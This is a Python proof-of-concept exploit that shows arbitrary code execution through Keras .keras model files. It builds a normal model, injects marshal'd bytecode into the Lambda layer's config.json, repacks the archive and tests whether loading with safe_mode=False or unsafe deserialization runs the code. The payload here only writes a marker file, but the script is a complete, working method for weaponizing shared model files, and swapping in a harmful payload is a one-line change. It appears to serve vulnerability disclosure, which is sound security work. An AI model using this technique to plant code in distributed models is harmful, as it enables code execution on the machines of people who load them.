File size: 8,712 Bytes
56f70cb | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 | #!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC
VULNERABILITY:
.keras model files are ZIP archives containing config.json. Lambda layers
store base64-encoded marshal'd Python bytecode in config.json under the
"function" -> "config" -> "code" key. When a model is loaded with
safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
this bytecode is unmarshalled and executed - enabling arbitrary code execution
from a crafted model file.
IMPACT:
Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
code execution. Many official tutorials and StackOverflow answers recommend
safe_mode=False to load models with custom layers. HuggingFace hosts thousands
of .keras files that could be replaced with malicious versions.
ATTACK VECTOR:
1. Attacker creates a legitimate-looking .keras model
2. Attacker replaces Lambda layer bytecode with malicious payload
3. Victim downloads model from HuggingFace, Kaggle, or email
4. Victim loads with safe_mode=False -> code executes silently
AFFECTED:
- keras >= 3.0 (all versions using .keras format)
- tensorflow >= 2.16 (ships keras 3.x)
TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12
Usage:
python3 poc_keras_lambda_ace.py
"""
import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
MARKER_FILE = "/tmp/keras_ace_marker.txt"
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"
def create_malicious_keras_model(output_path):
import tensorflow as tf
import numpy as np
print("[*] Step 1: Building legitimate model with Lambda layer...")
model = tf.keras.Sequential([
tf.keras.layers.Input(shape=(5,)),
tf.keras.layers.Dense(10, name="dense_1"),
tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
tf.keras.layers.Dense(1, name="output"),
])
model.compile(optimizer="adam", loss="mse")
tmp_dir = tempfile.mkdtemp(prefix="keras_poc_")
legit_path = os.path.join(tmp_dir, "legit.keras")
model.save(legit_path)
print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))
print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
with zipfile.ZipFile(legit_path, "r") as zf:
archive_files = {name: zf.read(name) for name in zf.namelist()}
config = json.loads(archive_files["config.json"])
evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
MARKER_FILE, PAYLOAD_MSG
)
print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))
evil_expr = compile(evil_source, "<payload>", "eval")
lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0]
evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
print(" Encoded bytecode: {} chars".format(len(evil_b64)))
def inject_into_lambda(obj):
if isinstance(obj, dict):
if obj.get("class_name") == "Lambda" and "config" in obj:
func = obj["config"].get("function", {})
if isinstance(func, dict) and "config" in func:
func["config"]["code"] = evil_b64
print(" Injected payload into Lambda layer config")
return True
for v in obj.values():
if isinstance(v, (dict, list)) and inject_into_lambda(v):
return True
elif isinstance(obj, list):
for v in obj:
if inject_into_lambda(v):
return True
return False
if not inject_into_lambda(config):
print(" ERROR: Could not find Lambda layer in config.json")
sys.exit(1)
print("[*] Step 3: Repacking .keras file with malicious config...")
archive_files["config.json"] = json.dumps(config).encode()
with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
for name, data in archive_files.items():
zf.writestr(name, data)
print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
shutil.rmtree(tmp_dir)
def test_safe_mode_true(model_path):
import tensorflow as tf
print("\n[*] Test A: Loading with safe_mode=True (default)...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
tf.keras.models.load_model(model_path)
print(" Model loaded (unexpected)")
return os.path.exists(MARKER_FILE)
except Exception as e:
print(" Blocked as expected: {}".format(str(e)[:150]))
return False
def test_safe_mode_false(model_path):
import tensorflow as tf
import numpy as np
print("\n[*] Test B: Loading with safe_mode=False...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
loaded = tf.keras.models.load_model(model_path, safe_mode=False)
print(" Model loaded with safe_mode=False")
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
return True
print(" No execution on load. Running inference...")
result = loaded.predict(np.random.randn(1, 5), verbose=0)
print(" Inference result: {}".format(result))
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
return True
print(" No ACE triggered")
return False
except Exception as e:
print(" Error: {}".format(str(e)[:300]))
return False
def test_enable_unsafe_deserialization(model_path):
import tensorflow as tf
import numpy as np
print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
tf.keras.config.enable_unsafe_deserialization()
loaded = tf.keras.models.load_model(model_path)
print(" Model loaded with enable_unsafe_deserialization")
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
return True
print(" No execution on load. Running inference...")
result = loaded.predict(np.random.randn(1, 5), verbose=0)
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
return True
print(" No ACE triggered")
return False
except Exception as e:
print(" Error: {}".format(str(e)[:300]))
return False
def main():
print("=" * 70)
print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
print("=" * 70)
script_dir = os.path.dirname(os.path.abspath(__file__))
malicious_model = os.path.join(script_dir, "malicious_lambda.keras")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
create_malicious_keras_model(malicious_model)
ace_safe = test_safe_mode_true(malicious_model)
ace_unsafe = test_safe_mode_false(malicious_model)
ace_global = test_enable_unsafe_deserialization(malicious_model)
print("\n" + "=" * 70)
print("RESULTS:")
print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)"))
print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE"))
print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE"))
print()
if ace_unsafe or ace_global:
print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
print("code execution when loaded with safe_mode=False or after calling")
print("enable_unsafe_deserialization().")
print()
print("Marker file: {}".format(MARKER_FILE))
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
print("Contents: {}".format(f.read().strip()))
print("\nMalicious model saved to: {}".format(malicious_model))
else:
print("No ACE triggered. Check TensorFlow/Keras version.")
print("=" * 70)
if __name__ == "__main__":
main()
|